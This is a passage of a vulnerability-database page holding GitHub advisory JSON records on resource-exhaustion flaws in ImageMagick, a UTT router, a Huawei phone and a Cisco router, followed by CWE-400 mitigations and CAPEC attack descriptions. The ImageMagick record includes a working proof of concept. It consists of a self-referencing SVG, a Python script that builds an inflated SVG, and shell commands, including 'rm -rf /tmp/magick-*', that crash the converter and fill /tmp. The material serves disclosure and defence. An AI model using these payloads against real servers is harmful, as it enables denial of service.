"ecosystem": "NuGet",
"name": "Magick.NET-Q8-OpenMP-arm64"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "13.0.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 12.3.0"
},
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q8-OpenMP-x64"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "13.0.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 12.3.0"
},
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q8-arm64"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "13.0.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 12.3.0"
},
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q8-x64"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "13.0.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 12.3.0"
},
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q8-x86"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "13.0.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-1289"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-400"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-12T20:30:45Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "### Summary\nSpecially crafted SVG file make segmentation fault and generate trash files in \"/tmp\", possible to leverage DoS.\n\n### Operating system, version and so on\n\nLinux, Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara)\n\n### Tested ImageMagick version\n\n6.9.11-60, 7.1.0-62\n\n### Details\nA specially created SVG file that loads by itself and make segmentation fault. Remote attackers can take advantage of this vulnerability to cause a denial of service of the generated SVG file.\n\nIt seems that this error affects a lot of websites and causes a generating trash files in ```/tmp``` when uploading this PC file to the server.\n\nI think it\u0027s better to check the file descriptor coming from itself before executing ```read()```.\n\n### PoC\n1. Generate SVG file:\n```\u003c?xml version=\"1.0\" standalone=\"yes\"?\u003e\n\u003c!DOCTYPE test\u003e\n\u003csvg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"\u003e\n\u003cimage height=\"200\" width=\"200\" xlink:href=\"bad.svg\" /\u003e\n\u003c/svg\u003e\n```\n2. Run some commands for verification:\n```$rm -f /tmp/*\n$./magick --version\nVersion: ImageMagick 7.1.0-62 Q16-HDRI x86_64 74b3683a4:20230211 https://imagemagick.org\nCopyright: (C) 1999 ImageMagick Studio LLC\nLicense: https://imagemagick.org/script/license.php\nFeatures: Cipher DPC HDRI OpenMP(4.5) \nDelegates (built-in): bzlib djvu fontconfig freetype jbig jng jpeg lcms lqr lzma openexr png raqm tiff webp x xml zlib\nCompiler: gcc (7.5)\n$./magick convert -verbose -font OpenSymbol bad.svg t.jpg\n\u0027inkscape\u0027 \u0027/tmp/magick-ixX13JwrwrLUhyucKsGxechsQtEN4Zji\u0027 --export-filename=\u0027/tmp/magick-qp154V6U-dyAwtU-QbcnWD8XKFcG7q5k.png\u0027 --export-dpi=\u002796\u0027 --export-background=\u0027rgb(100%,100%,100%)\u0027 --export-background-opacity=\u00271\u0027 \u003e \u0027/tmp/magick-YWdlPJt-_9BfRq0uY2vmza_VOxWfjyvl\u0027 2\u003e\u00261\nSegmentation fault\n$ls /tmp\nmagick-1iZstE-dzlzQTN4HkWX_JlakXXtH4IEM magick-GeFwj8Be_wISDLJnsr4s5WC7p079pzXN magick-s7QN2tTaiXEr9KmkbkHdmtfmgrnjFRaM\nmagick-1LG0ND-RZMQOG8xizDHd-qdd6_Fu70YP magick-ggORXwnSivWesH2gthhafuLTVw7TLqwP magick-s835rBXZIGK5bkp3ijKoMTCbcyWza3ON\nmagick-25byX_oEeEr2dWIkr9nyEoVz1MHC2n9M magick-GrRg60fY1LOv4uUhqD16AaEcL6rWtNeN magick-siS7QS_av31X63ENYmecytIjx1iKmWAN\nmagick-2Dj7LuLUHF6Y93mZ9ZT8a5taf7b5Hb9O magick-gTQUBafZIaI1n8q-QXOwOvyc6qv3tolN magick-SIXvVjWVvDhX1w5NL9K6owJtO0CgG3NN\nmagick-2GrJuPlQjwGwsTK8I1aTMxg90h8PeK4M magick-hik3AU_2x0D_R8ViIBXUIuRljCXSmgqO magick-sJhO2Yv_aeKsxt1JxDENKIiQqkOkSfwM\nmagick-2QIFnR9e-fYRFevd1-vQ-bSk0I1VOAsO magick-HJ18uyG3HLvEftNcMqCEJ5LKwi12CQgO magick-SNgGdhyKjp5TZZQmWqioLEcyQ8vMzG3O\nmagick-2rEueYW0PIXGxE1zHm3LsGedMW2KLdgP magick-hUaNDJgYfzTzJes4QlnLwaYh2fcaOWgQ magick-SxLBCSdKVHSQOrjohe4WFyLHaPOyDUiP\nmagick-2uRqbAjqkXXMMGQHpw8WG18lnDHaRd3N magick-_HWqrSdj_ihWMzjJ_eRiAkKbgrIljhUM magick-t02HQvZSsYLzmJesC2Mpjp5OL3zN4A5P\nmagick-3dPT4h0HzM6ZqCwpGEB69e27pZhHbfHP magick-iEMFbMc2VvGj067miVskUC-mxOveGpqO magick-T4kTJGu-6wF60OOIHOB5tKO63NW5qTTL\nmagick-3SVSiI4Yg_eQ01ZZV8lZsBM_MhauuwpO magick-InCjmKQ7uSGizlJFOZz9Vo3Ax1yvLy5L magick-TGIY7l3-dNVdAbGaMIbN0z3YGy5mrNvM\nmagick-3WQIQghdu9-YHVasNASfkkU63yyVdmfO magick-IPu9YWX3Lk96EkP63KLqQ-CX6020cZMN magick-Thg6M-CqdcXc0SyjRdYm19rtVBLt2U6P\nmagick-4hLf4JPIes67QpGP7GfmOPftGvENC1aN magick-IVKuPYBpBe6Lx9F3lLMAMCjIptMoz0ZM magick-TiTtPZdT3Zgsd-pasyRFTb-DbLGNqJTO\nmagick-4tTMAJrCHh2E8M1xw5BIjx8UDyb42FWM magick-IVzovwQiOR2fwJDO5E5RZb58apCPBX8M magick-_TQZIwyyLufZWMVx1-k3YLSYSsGl6upM\nmagick-4xs5mqt95PYGrXXxZiwyYHFKREC0NEWL magick-J36psEABfkKfgVQdeFsptbkRWT0b1uNP magick-tzMg0NWi-_GQOzES2aPMPRqCk-bgjyVN\nmagick-5DmloHI-m-WPROyfQmm5cF8GOEVa5EqO magick-jEq-Q6t6D3CU-eevjhgfjU_LPP3pOEoO magick-ULNarZD53mUqpJrHZVeZw5x0cuUH683N\nmagick-5JvQUY2vVq_kpzhfUTcsxao_YB2WImZN magick-jNiokVz_0Iifz5QX3a9AUIUOBoxfJ49P magick-uLR13qPG6X-c3avLRypLJ-C7-UiUH9tM\nmagick-5NoXNg55Xyh8816ksKEcqreuN1BF93LO magick-jwa4IVvrxrE4OTSA0m8iB2W3K5LiinmQ magick-uW9khwJZfM4EH1cETVDv09QnueONQGPP\nmagick-60BRKi88--TOk-Sp8t5nAyAxjSuOpxfO magick-K5mhLUCkx0WJxcWr7G7oT0nNrc5qBvgQ magick-v4l3nLHBXBjCNc-nTHSTwUOEfsNCUMnP\nmagick-6t2qB_JnplYLZZo5thj6PV0R15LrPe4L magick-K5qzx3k8-36H5wfEgl3Jy1oNpOyscHhN magick-v7Xm_e5JIf4lCC_CwXJkIuQNHEE7D1LM\nmagick-6_UmuyWO8OviaajA92_VeD1bK8z0btAO magick-K6-l4o2PkC4V7Nq_IJ9y-ifJLl6lSzdM magick-vd7xpM8OrXvu3Oftqd7xdRmGDdoGcHrP\nmagick-725dkkTfpkfKmogI4WLWWwCbrxc0aysP magick-KchLIwf4-ahsUq1FsJfK58j3Jb6CAMTP magick-VhfNmWGF-AOhytm1DMGG8n1DLOAG3p1N\nmagick-7rZG_PFyH2Q7ibxFrB4kTQZjkihhU9uO magick-kpcUuOTI4UlrK8kHoZh38ziLMmBjtjvO magick-vHp_Pz6BixbqmYCq_D2zs2sU4hFRbQoP\nmagick--7T1tmKSEJSSPJIgeDEQ9PLdo8oPh60P magick-kReWGvubeCrLdw4RcRsJdJhlV43wCffM magick-VLoWnTJppgO7-ivh0q_uuGcgPDkuyKPN\nmagick-8jBguKQr6qeZTsw4eFbQWO34ndlsBpbO magick-LBjQNSTFFpLRnj3Cldvjm5e_PWYL1fLL magick-Vp_vOIJK-XsFRZeAS1ZJ9Ra2vkgJbCOL\nmagick-9Hno6LBapbL0jw_CSEC7Ua6A7kB3uYiN magick-Lfu-5C1697AwNxTZnljfR24E2_7ZDnwP magick-VpzT9KMjKbomi6mV3ZnnRkoq1WAP41vM\nmagick-9SN2401usIEYCc6zcn442pdvqyVdPWaQ magick-lHxUfKDHYSfpVi7yOc31u7gJVTXLhSuN magick-vRG2_rcf6I8lB2MJF6DqHqh2_z21IP5N\nmagick-a1uVHLsbEnA8yXKvwmW3PWAFBdnfoSnQ magick-M4mcsykxHPNkFTDgc4tdJ9kP1Trkm64M magick-vw2VNrClFVhnXLqVoIz35Xpo232qsngN\nmagick-AbpJUZcspor3bkYr70l17bGSjntyAhZP magick-m5P0dZWaFUeZo4kr8HcO6vpfuICmmBcM magick-WEYdL0amRHxeCpuGiFEuulRwwzkjZyXO\nmagick-Acsy_QEmT-x7nE6DvfIv2pqjLbfJYTtN magick-MHI0zAFGR1-ljbFLl12i5hFVpkoBbdpN magick-WKjEe_jTF4V6Jt_kCbFEy2B6kQcyFseQ\nmagick-Ai76_QfTBT0DXjGqvZ_aAGia_gvAxuGM magick-mOckd_uEYCLc9gy1XwVgtJWpr1aDU7QP magick-WkkwqgsnNNSleWlRm-1BN8RiE-QcF9lO\nmagick-albf_l7tU2ASh6PRhnMWBDscz31fS1BO magick-MrajCpsti_3MlAWlNviDCY3iUeZsgGLM magick-WMlxV7rdjtMYe1F0aggQZW2WNpvhY2GO\nmagick-A-nsLcvOOBlHzdBGQMSsdTrvsfUevEQO magick-mZyca0hC8atGLvY-m0UYec1yCU3rGIWM magick-wnqAodNT7ZVbe8dIN-Gd2pxCNo6cwzOL\nmagick-AplCAOC7_K6cDM3qO3wqSONMhVuztohO magick-NAH0CgD3XCLMS1VN_-4yju-2RCdFJbGO magick-wP3Q3aM05wB2K6NBolzm6sC_R3b5wE1P\nmagick-ApNw8tmuaXUw-mqdMF7P0ZKOV3YHwQGM magick-NU3oGX5NxUhJvWQ_WWY8-7BNAnHWJceM magick-wsCa-R-K6HYtZ7FWWnPg3FpOyGmS1wuO\nmagick-AWye85xaEc_t6rGB9bIvIz9BBhrRyg3O magick-NZBKgJGx7bH8uZ2PiKF8jtzCI9aBDVZN magick-WvNjMMQ2gXHSGNWCMceMqBL8ksnGZIuO\nmagick-aXtmFaHIdz24xjFvCy4ZQda2wef0AH0N magick-o3FerPGSptnb0U5mHu6DH-00ZTlTlDCO magick-xAPfisi5E9NHJKbkrbCGioXCkTs3uDYM\nmagick-B5uiXH3Mrf0GgmF9NAPwqSJd-lMFLfrM magick-o4Dl5iYn3veI54-lNtHgm6wnAIQ79urP magick-Xb2irJZuxzYWsCfmYHc8oaKU67ANR27N\nmagick-BEr6_VZecWKFCRVuSXPEIbJu6uuBe0pO magick-o9S5taGlSrED8zUEtv0EkpjoWk61fJBO magick-Xkes-Q_QqXhMthGwFKxLjpRvL96qRd6O\nmagick-bKCtVcSkQqtXdjO8X_AyWeocMsYuZArN magick-OeHngPf0pRuDH9DpIs_OpkoAbDnAvBTL magick-xlhsal9kyY6QMOSb1WmyTx1vGTqE94bO\nmagick-Btw2-hfTAVQLiPRMXakrXs_UhstT2ZGM magick-OhD82cIFbY91zGxpIt52AbjWekddAU2L magick-xmmr39PvOExl0B8w0YO_oq2_yYyWoVLM\nmagick-By2_pnDUxk85bO3M7kkMbAEXHGShyc0O magick-OlcHbZjE_-66xMyWVlhfAucxYJioiQ4L magick-xq9qw9wK-TRFokBTostne36jQXljCa7M\n...\n```\n\n### Impact\nPossible DOS, because when ImageMagick crashes it generates a lot of trash files. This trash file can be large, if SVG file contains many render action.\n\n### Additional impact\nIn DOS attack if remount attacker uploads an SVG file of size t, ImageMagick generates files of size 103*t. This means that if an attacker uploads a 100 M SVG, the server will generate about 10 G.\n\nExample:\n```\n$cat dos_poc.py \nopen(\"bad_dos.svg\", \"w\").write(\"\"\"\u003c?xml version=\"1.0\"?\u003e\n\u003c?xml-stylesheet href=\"https://example.com/style.xsl\" type=\"text/xsl\" ?\u003e\n\u003c!DOCTYPE test\u003e\n\u003csvg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"\u003e\n\u003cimage height=\"200\" width=\"200\" href=\"bad_dos.svg\u0026quot;\"\"\" + \"0\"*(1024*1021) + \"\"\"\u0026quot;\" /\u003e\n\u003c/svg\u003e\"\"\")\n$rm -rf /tmp/magick-*\n$python3 dos_poc.py\n$du -h bad_dos.svg\n1,0M\tbad_dos.svg\n$../magick convert -font OpenSymbol bad_dos.svg t.jpg \nSegmentation fault\n$cat /tmp/magick-* \u003e dos_k.txt\n$du -h dos_k.txt \n103M\tdos_k.txt\n```\n\nP. S. If ImageMagick will work in Docker container this attack will crash server where docker running. Because the size of the docker container will increase.",
"id": "GHSA-j96m-mjp6-99xr",
"modified": "2026-03-12T20:30:45Z",
"published": "2026-03-12T20:30:45Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-j96m-mjp6-99xr"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-1289"
},
{
"type": "WEB",
"url": "https://github.com/ImageMagick/ImageMagick/commit/c5b23cbf2119540725e6dc81f4deb25798ead6a4"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2176858"
},
{
"type": "PACKAGE",
"url": "https://github.com/ImageMagick/ImageMagick"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2024/02/msg00007.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "ImageMagick: Specially crafted SVG leads to segmentation fault and generate trash files in \"/tmp\", possible to leverage DoS"
}
GHSA-J9WF-C8WX-6M8M
Vulnerability from github – Published: 2026-07-02 21:32 – Updated: 2026-07-06 18:30An issue in UTT nv518G nv518GV3v3.2.7-210919-161313 allows a remote attacker to cause a denial of service via the gohead/sub_445C5C component
{
"affected": [],
"aliases": [
"CVE-2026-52192"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-07-02T21:16:56Z",
"severity": "HIGH"
},
"details": "An issue in UTT nv518G nv518GV3v3.2.7-210919-161313 allows a remote attacker to cause a denial of service via the gohead/sub_445C5C component",
"id": "GHSA-j9wf-c8wx-6m8m",
"modified": "2026-07-06T18:30:42Z",
"published": "2026-07-02T21:32:16Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-52192"
},
{
"type": "WEB",
"url": "https://github.com/akuma-QAQ/CVEreport/tree/main/518G/FUN_00445c5c"
},
{
"type": "WEB",
"url": "https://utt.com.cn/downloadcenter.php?filetypeid=3\u0026model=518G\u0026lang=zhcn"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-JC3V-29VJ-6W26
Vulnerability from github – Published: 2022-05-14 03:43 – Updated: 2022-05-14 03:43Huawei Smartphones with software LON-L29DC721B186 have a denial of service vulnerability. An attacker could make an loop exit condition that cannot be reached by sending the crafted 3GPP message. Successful exploit could cause the device to reboot.
{
"affected": [],
"aliases": [
"CVE-2017-15345"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-02-15T16:29:00Z",
"severity": "MODERATE"
},
"details": "Huawei Smartphones with software LON-L29DC721B186 have a denial of service vulnerability. An attacker could make an loop exit condition that cannot be reached by sending the crafted 3GPP message. Successful exploit could cause the device to reboot.",
"id": "GHSA-jc3v-29vj-6w26",
"modified": "2022-05-14T03:43:42Z",
"published": "2022-05-14T03:43:42Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-15345"
},
{
"type": "WEB",
"url": "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20171108-01-smartphone-en"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-JC4F-W7G4-MHXV
Vulnerability from github – Published: 2022-05-13 01:34 – Updated: 2022-05-13 01:34A vulnerability in Cisco 900 Series Aggregation Services Router (ASR) software could allow an unauthenticated, remote attacker to cause a partial denial of service (DoS) condition on an affected device. The vulnerability is due to insufficient handling of certain broadcast packets ingress to the device. An attacker could exploit this vulnerability by sending large streams of broadcast packets to an affected device. If successful, an exploit could allow an attacker to impact services running on the device, resulting in a partial DoS condition.
{
"affected": [],
"aliases": [
"CVE-2018-15464"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-01-11T15:29:00Z",
"severity": "MODERATE"
},
"details": "A vulnerability in Cisco 900 Series Aggregation Services Router (ASR) software could allow an unauthenticated, remote attacker to cause a partial denial of service (DoS) condition on an affected device. The vulnerability is due to insufficient handling of certain broadcast packets ingress to the device. An attacker could exploit this vulnerability by sending large streams of broadcast packets to an affected device. If successful, an exploit could allow an attacker to impact services running on the device, resulting in a partial DoS condition.",
"id": "GHSA-jc4f-w7g4-mhxv",
"modified": "2022-05-13T01:34:13Z",
"published": "2022-05-13T01:34:13Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-15464"
},
{
"type": "WEB",
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190109-asr900-dos"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/106550"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L",
"type": "CVSS_V3"
}
]
}
Mitigation
Design throttling mechanisms into the system architecture. The best protection is to limit the amount of resources that an unauthorized user can cause to be expended. A strong authentication and access control model will help prevent such attacks from occurring in the first place. The login application should be protected against DoS attacks as much as possible. Limiting the database access, perhaps by caching result sets, can help minimize the resources expended. To further limit the potential for a DoS attack, consider tracking the rate of requests received from users and blocking requests that exceed a defined rate threshold.
Mitigation
- Mitigation of resource exhaustion attacks requires that the target system either:
- The first of these solutions is an issue in itself though, since it may allow attackers to prevent the use of the system by a particular valid user. If the attacker impersonates the valid user, they may be able to prevent the user from accessing the server in question.
- The second solution is simply difficult to effectively institute -- and even when properly done, it does not provide a full solution. It simply makes the attack require more resources on the part of the attacker.
- recognizes the attack and denies that user further access for a given amount of time, or
- uniformly throttles all requests in order to make it more difficult to consume resources more quickly than they can again be freed.
Mitigation
Ensure that protocols have specific limits of scale placed on them.
Mitigation
Ensure that all failures in resource allocation place the system into a safe posture.
CAPEC-147: XML Ping of the Death
An attacker initiates a resource depletion attack where a large number of small XML messages are delivered at a sufficiently rapid rate to cause a denial of service or crash of the target. Transactions such as repetitive SOAP transactions can deplete resources faster than a simple flooding attack because of the additional resources used by the SOAP protocol and the resources necessary to process SOAP messages. The transactions used are immaterial as long as they cause resource utilization on the target. In other words, this is a normal flooding attack augmented by using messages that will require extra processing on the target.
CAPEC-227: Sustained Client Engagement
An adversary attempts to deny legitimate users access to a resource by continually engaging a specific resource in an attempt to keep the resource tied up as long as possible. The adversary's primary goal is not to crash or flood the target, which would alert defenders; rather it is to repeatedly perform actions or abuse algorithmic flaws such that a given resource is tied up and not available to a legitimate user. By carefully crafting a requests that keep the resource engaged through what is seemingly benign requests, legitimate users are limited or completely denied access to the resource.
CAPEC-492: Regular Expression Exponential Blowup
An adversary may execute an attack on a program that uses a poor Regular Expression(Regex) implementation by choosing input that results in an extreme situation for the Regex. A typical extreme situation operates at exponential time compared to the input size. This is due to most implementations using a Nondeterministic Finite Automaton(NFA) state machine to be built by the Regex algorithm since NFA allows backtracking and thus more complex regular expressions.